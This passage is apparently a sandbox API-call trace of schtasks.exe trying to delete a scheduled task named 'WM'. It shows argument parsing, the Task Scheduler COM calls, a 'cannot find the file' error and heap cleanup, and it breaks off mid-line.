lstrlenW (lpString="?") returned 1 [0142.899] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.899] lstrlenW (lpString="tn") returned 2 [0142.899] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.899] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|?|") returned 3 [0142.899] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.899] lstrlenW (lpString="|?|") returned 3 [0142.899] lstrlenW (lpString="|tn|") returned 4 [0142.899] RtlRestoreLastWin32Error () returned 0x490 [0142.899] lstrlenW (lpString="s") returned 1 [0142.899] lstrlenW (lpString="s") returned 1 [0142.900] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.900] lstrlenW (lpString="tn") returned 2 [0142.900] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.900] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|s|") returned 3 [0142.900] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.901] lstrlenW (lpString="|s|") returned 3 [0142.901] lstrlenW (lpString="|tn|") returned 4 [0142.901] RtlRestoreLastWin32Error () returned 0x490 [0142.901] lstrlenW (lpString="u") returned 1 [0142.901] lstrlenW (lpString="u") returned 1 [0142.901] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.901] lstrlenW (lpString="tn") returned 2 [0142.901] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.901] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|u|") returned 3 [0142.901] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.901] lstrlenW (lpString="|u|") returned 3 [0142.901] lstrlenW (lpString="|tn|") returned 4 [0142.901] RtlRestoreLastWin32Error () returned 0x490 [0142.901] lstrlenW (lpString="p") returned 1 [0142.901] lstrlenW (lpString="p") returned 1 [0142.901] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.902] lstrlenW (lpString="tn") returned 2 [0142.902] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.902] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|p|") returned 3 [0142.902] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.902] lstrlenW (lpString="|p|") returned 3 [0142.902] lstrlenW (lpString="|tn|") returned 4 [0142.902] RtlRestoreLastWin32Error () returned 0x490 [0142.902] lstrlenW (lpString="tn") returned 2 [0142.902] lstrlenW (lpString="tn") returned 2 [0142.902] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.902] lstrlenW (lpString="tn") returned 2 [0142.902] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.902] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.902] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.902] lstrlenW (lpString="|tn|") returned 4 [0142.902] lstrlenW (lpString="|tn|") returned 4 [0142.902] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0142.902] RtlRestoreLastWin32Error () returned 0x0 [0142.902] RtlRestoreLastWin32Error () returned 0x0 [0142.902] lstrlenW (lpString="WM") returned 2 [0142.902] lstrlenW (lpString="-/") returned 2 [0142.902] StrChrIW (lpStart="-/", wMatch=0x2c0057) returned 0x0 [0142.902] RtlRestoreLastWin32Error () returned 0x490 [0142.902] RtlRestoreLastWin32Error () returned 0x490 [0142.902] RtlRestoreLastWin32Error () returned 0x0 [0142.902] lstrlenW (lpString="WM") returned 2 [0142.902] StrChrIW (lpStart="WM", wMatch=0x3a) returned 0x0 [0142.902] RtlRestoreLastWin32Error () returned 0x490 [0142.902] RtlRestoreLastWin32Error () returned 0x0 [0142.902] lstrlenW (lpString="WM") returned 2 [0142.903] RtlRestoreLastWin32Error () returned 0x0 [0142.903] RtlRestoreLastWin32Error () returned 0x0 [0142.903] lstrlenW (lpString="/F") returned 2 [0142.903] lstrlenW (lpString="-/") returned 2 [0142.903] StrChrIW (lpStart="-/", wMatch=0x2c002f) returned="/" [0142.903] lstrlenW (lpString="delete") returned 6 [0142.903] lstrlenW (lpString="delete") returned 6 [0142.903] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.903] lstrlenW (lpString="F") returned 1 [0142.903] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.903] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|delete|") returned 8 [0142.903] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|F|") returned 3 [0142.903] lstrlenW (lpString="|delete|") returned 8 [0142.903] lstrlenW (lpString="|F|") returned 3 [0142.903] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0142.903] RtlRestoreLastWin32Error () returned 0x490 [0142.903] lstrlenW (lpString="?") returned 1 [0142.903] lstrlenW (lpString="?") returned 1 [0142.903] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.903] lstrlenW (lpString="F") returned 1 [0142.903] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.903] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|?|") returned 3 [0142.903] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|F|") returned 3 [0142.903] lstrlenW (lpString="|?|") returned 3 [0142.903] lstrlenW (lpString="|F|") returned 3 [0142.903] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0142.903] RtlRestoreLastWin32Error () returned 0x490 [0142.903] lstrlenW (lpString="s") returned 1 [0142.903] lstrlenW (lpString="s") returned 1 [0142.903] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.904] lstrlenW (lpString="F") returned 1 [0142.904] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.904] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|s|") returned 3 [0142.904] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|F|") returned 3 [0142.904] lstrlenW (lpString="|s|") returned 3 [0142.904] lstrlenW (lpString="|F|") returned 3 [0142.904] StrStrIW (lpFirst="|s|", lpSrch="|F|") returned 0x0 [0142.904] RtlRestoreLastWin32Error () returned 0x490 [0142.904] lstrlenW (lpString="u") returned 1 [0142.904] lstrlenW (lpString="u") returned 1 [0142.904] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.904] lstrlenW (lpString="F") returned 1 [0142.904] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.904] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|u|") returned 3 [0142.904] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|F|") returned 3 [0142.904] lstrlenW (lpString="|u|") returned 3 [0142.904] lstrlenW (lpString="|F|") returned 3 [0142.904] StrStrIW (lpFirst="|u|", lpSrch="|F|") returned 0x0 [0142.904] RtlRestoreLastWin32Error () returned 0x490 [0142.904] lstrlenW (lpString="p") returned 1 [0142.904] lstrlenW (lpString="p") returned 1 [0142.904] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.904] lstrlenW (lpString="F") returned 1 [0142.904] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.904] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|p|") returned 3 [0142.906] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|F|") returned 3 [0142.906] lstrlenW (lpString="|p|") returned 3 [0142.906] lstrlenW (lpString="|F|") returned 3 [0142.906] StrStrIW (lpFirst="|p|", lpSrch="|F|") returned 0x0 [0142.906] RtlRestoreLastWin32Error () returned 0x490 [0142.906] lstrlenW (lpString="tn") returned 2 [0142.906] lstrlenW (lpString="tn") returned 2 [0142.906] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.906] lstrlenW (lpString="F") returned 1 [0142.906] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.907] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.907] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|F|") returned 3 [0142.907] lstrlenW (lpString="|tn|") returned 4 [0142.907] lstrlenW (lpString="|F|") returned 3 [0142.907] StrStrIW (lpFirst="|tn|", lpSrch="|F|") returned 0x0 [0142.907] RtlRestoreLastWin32Error () returned 0x490 [0142.907] lstrlenW (lpString="f") returned 1 [0142.907] lstrlenW (lpString="f") returned 1 [0142.907] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.907] lstrlenW (lpString="F") returned 1 [0142.907] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.907] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|f|") returned 3 [0142.907] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|F|") returned 3 [0142.907] lstrlenW (lpString="|f|") returned 3 [0142.907] lstrlenW (lpString="|F|") returned 3 [0142.907] StrStrIW (lpFirst="|f|", lpSrch="|F|") returned="|f|" [0142.907] RtlRestoreLastWin32Error () returned 0x0 [0142.907] RtlRestoreLastWin32Error () returned 0x0 [0142.908] lstrlenW (lpString="WM") returned 2 [0142.908] RtlRestoreLastWin32Error () returned 0x0 [0142.908] ResolveDelayLoadedAPI () returned 0x76aecf00 [0142.908] OpenSCManagerW (lpMachineName="", lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x477af90 [0142.923] OpenServiceW (hSCManager=0x477af90, lpServiceName="Schedule", dwDesiredAccess=0x14) returned 0x477b278 [0142.925] ResolveDelayLoadedAPI () returned 0x76aec010 [0142.926] QueryServiceStatus (in: hService=0x477b278, lpServiceStatus=0xdefe4 | out: lpServiceStatus=0xdefe4*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x12c5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0142.926] CloseServiceHandle (hSCObject=0x477af90) returned 1 [0142.927] CloseServiceHandle (hSCObject=0x477b278) returned 1 [0142.928] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0142.936] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0142.952] CoCreateInstance (in: rclsid=0x2d26c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x2d26d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdf39c | out: ppv=0xdf39c*=0x2c3718) returned 0x0 [0143.268] TaskScheduler:ITaskService:Connect (This=0x2c3718, serverName=0xdf34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdf35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdf36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdf37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0143.295] TaskScheduler:ITaskService:GetFolder (in: This=0x2c3718, Path=0x0, ppFolder=0xdf430 | out: ppFolder=0xdf430*=0x2c3840) returned 0x0 [0143.298] GetProcessHeap () returned 0x4770000 [0143.298] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4779de0 [0143.298] GetThreadLocale () returned 0x409 [0143.298] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="WM", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3 [0143.298] ITaskFolder:GetTask (in: This=0x2c3840, Path="WM", ppTask=0xdf3b4 | out: ppTask=0xdf3b4*=0x0) returned 0x80070002 [0143.299] lstrlenW (lpString="WM") returned 2 [0143.299] GetProcessHeap () returned 0x4770000 [0143.299] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6) returned 0x47838e0 [0143.299] GetProcessHeap () returned 0x4770000 [0143.299] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4781c80 [0143.299] ITaskFolder:DeleteTask (This=0x2c3840, Name="WM", flags=0) returned 0x80070002 [0143.300] RtlRestoreLastWin32Error () returned 0x80070002 [0143.300] __iob_func () returned 0x74971208 [0143.300] GetLastError () returned 0x80070002 [0143.300] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x80070002, dwLanguageId=0x0, lpBuffer=0xdf3f8, nSize=0x0, Arguments=0x0 | out: lpBuffer="醸Ѹ礼\r냖.\x02耇") returned 0x2c [0143.303] GetLastError () returned 0x80070002 [0143.303] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44 [0143.303] GetProcessHeap () returned 0x4770000 [0143.303] GetProcessHeap () returned 0x4770000 [0143.303] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4770598) returned 1 [0143.303] GetProcessHeap () returned 0x4770000 [0143.303] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4770598) returned 0x2 [0143.304] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4770598) returned 1 [0143.304] GetProcessHeap () returned 0x4770000 [0143.304] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x5a) returned 0x4789220 [0143.304] RtlRestoreLastWin32Error () returned 0x80070002 [0143.304] LocalFree (hMem=0x47891b8) returned 0x0 [0143.304] GetProcessHeap () returned 0x4770000 [0143.304] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4781bc0 [0143.304] _memicmp (_Buf1=0x4777328, _Buf2=0x2d2708, _Size=0x7) returned 0 [0143.304] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x477a718, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0143.304] lstrlenW (lpString="ERROR:") returned 6 [0143.304] GetProcessHeap () returned 0x4770000 [0143.304] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xe) returned 0x4779df8 [0143.304] GetProcessHeap () returned 0x4770000 [0143.304] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4779e10 [0143.304] _memicmp (_Buf1=0x4779e10, _Buf2=0x2d2708, _Size=0x7) returned 0 [0143.304] GetProcessHeap () returned 0x4770000 [0143.304] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x1000) returned 0x478a670 [0143.304] _vsnwprintf (in: _Buffer=0x478a670, _BufferCount=0x7ff, _Format="%s ", _ArgList=0xdf3fc | out: _Buffer="ERROR: ") returned 7 [0143.309] _fileno (_File=0x74971248) returned 2 [0143.309] _errno () returned 0x2c05b0 [0143.309] _get_osfhandle (_FileHandle=2) returned 0x140 [0143.309] _errno () returned 0x2c05b0 [0143.309] GetFileType (hFile=0x140) returned 0x2 [0143.309] GetStdHandle (nStdHandle=0xfffffff4) returned 0x140 [0143.309] GetFileType (hFile=0x140) returned 0x2 [0143.309] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xdf3a4 | out: lpMode=0xdf3a4) returned 0 [0143.309] lstrlenW (lpString="ERROR: ") returned 7 [0143.309] GetConsoleOutputCP () returned 0x1b5 [0143.311] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.311] GetConsoleOutputCP () returned 0x1b5 [0143.312] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0x2fb170, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR: ", lpUsedDefaultChar=0x0) returned 7 [0143.312] fprintf (in: _File=0x74971248, _Format="%s" | out: _File=0x74971248) returned 7 [0143.313] fflush (in: _File=0x74971248 | out: _File=0x74971248) returned 0 [0143.313] _fileno (_File=0x74971248) returned 2 [0143.313] _errno () returned 0x2c05b0 [0143.313] _get_osfhandle (_FileHandle=2) returned 0x140 [0143.313] _errno () returned 0x2c05b0 [0143.313] GetFileType (hFile=0x140) returned 0x2 [0143.313] GetStdHandle (nStdHandle=0xfffffff4) returned 0x140 [0143.313] GetFileType (hFile=0x140) returned 0x2 [0143.313] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xdf3d0 | out: lpMode=0xdf3d0) returned 0 [0143.313] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44 [0143.313] GetConsoleOutputCP () returned 0x1b5 [0143.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system cannot find the file specified.\r\n", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0143.314] GetConsoleOutputCP () returned 0x1b5 [0143.315] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system cannot find the file specified.\r\n", cchWideChar=44, lpMultiByteStr=0x2fb170, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the file specified.\r\n", lpUsedDefaultChar=0x0) returned 44 [0143.315] fprintf (in: _File=0x74971248, _Format="%s" | out: _File=0x74971248) returned 44 [0143.315] fflush (in: _File=0x74971248 | out: _File=0x74971248) returned 0 [0143.316] TaskScheduler:IUnknown:Release (This=0x2c3840) returned 0x0 [0143.316] TaskScheduler:IUnknown:Release (This=0x2c3718) returned 0x0 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779548) returned 1 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779548) returned 0x16 [0143.316] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779548) returned 1 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777370) returned 1 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777370) returned 0x10 [0143.316] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777370) returned 1 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779448) returned 1 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779448) returned 0x14 [0143.316] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779448) returned 1 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] GetProcessHeap () returned 0x4770000 [0143.316] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776960) returned 1 [0143.317] GetProcessHeap () returned 0x4770000 [0143.317] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776960) returned 0xa0 [0143.317] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776960) returned 1 [0143.317] GetProcessHeap () returned 0x4770000 [0143.317] GetProcessHeap () returned 0x4770000 [0143.317] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777400) returned 1 [0143.317] GetProcessHeap () returned 0x4770000 [0143.317] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777400) returned 0x10 [0143.317] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777400) returned 1 [0143.317] GetProcessHeap () returned 0x4770000 [0143.318] GetProcessHeap () returned 0x4770000 [0143.318] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47792e8) returned 1 [0143.318] GetProcessHeap () returned 0x4770000 [0143.318] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47792e8) returned 0x14 [0143.318] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47792e8) returned 1 [0143.318] GetProcessHeap () returned 0x4770000 [0143.318] GetProcessHeap () returned 0x4770000 [0143.318] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4778c60) returned 1 [0143.318] GetProcessHeap () returned 0x4770000 [0143.318] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4778c60) returned 0x208 [0143.319] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4778c60) returned 1 [0143.319] GetProcessHeap () returned 0x4770000 [0143.319] GetProcessHeap () returned 0x4770000 [0143.319] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777448) returned 1 [0143.319] GetProcessHeap () returned 0x4770000 [0143.319] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777448) returned 0x10 [0143.319] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777448) returned 1 [0143.319] GetProcessHeap () returned 0x4770000 [0143.319] GetProcessHeap () returned 0x4770000 [0143.319] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779668) returned 1 [0143.319] GetProcessHeap () returned 0x4770000 [0143.319] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779668) returned 0x14 [0143.319] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779668) returned 1 [0143.319] GetProcessHeap () returned 0x4770000 [0143.320] GetProcessHeap () returned 0x4770000 [0143.320] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477a718) returned 1 [0143.320] GetProcessHeap () returned 0x4770000 [0143.320] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477a718) returned 0x200 [0143.320] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477a718) returned 1 [0143.321] GetProcessHeap () returned 0x4770000 [0143.321] GetProcessHeap () returned 0x4770000 [0143.321] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777328) returned 1 [0143.321] GetProcessHeap () returned 0x4770000 [0143.321] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777328) returned 0x10 [0143.321] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777328) returned 1 [0143.321] GetProcessHeap () returned 0x4770000 [0143.321] GetProcessHeap () returned 0x4770000 [0143.321] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779308) returned 1 [0143.321] GetProcessHeap () returned 0x4770000 [0143.322] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779308) returned 0x14 [0143.322] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779308) returned 1 [0143.322] GetProcessHeap () returned 0x4770000 [0143.322] GetProcessHeap () returned 0x4770000 [0143.322] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x478a670) returned 1 [0143.322] GetProcessHeap () returned 0x4770000 [0143.322] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x478a670) returned 0x1000 [0143.323] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x478a670) returned 1 [0143.323] GetProcessHeap () returned 0x4770000 [0143.323] GetProcessHeap () returned 0x4770000 [0143.323] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779e10) returned 1 [0143.323] GetProcessHeap () returned 0x4770000 [0143.323] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779e10) returned 0x10 [0143.323] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779e10) returned 1 [0143.323] GetProcessHeap () returned 0x4770000 [0143.323] GetProcessHeap () returned 0x4770000 [0143.323] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47795e8) returned 1 [0143.323] GetProcessHeap () returned 0x4770000 [0143.323] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47795e8) returned 0x14 [0143.323] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47795e8) returned 1 [0143.323] GetProcessHeap () returned 0x4770000 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779428) returned 1 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779428) returned 0x14 [0143.324] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779428) returned 1 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773e8) returned 1 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773e8) returned 0x10 [0143.324] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773e8) returned 1 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4772768) returned 1 [0143.324] GetProcessHeap () returned 0x4770000 [0143.324] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4772768) returned 0x14 [0143.325] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4772768) returned 1 [0143.325] GetProcessHeap () returned 0x4770000 [0143.325] GetProcessHeap () returned 0x4770000 [0143.325] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779628) returned 1 [0143.325] GetProcessHeap () returned 0x4770000 [0143.325] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779628) returned 0x16 [0143.325] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779628) returned 1 [0143.325] GetProcessHeap () returned 0x4770000 [0143.325] GetProcessHeap () returned 0x4770000 [0143.325] HeapValidate (hHeap=0x4770000, dwFlags=0x0, 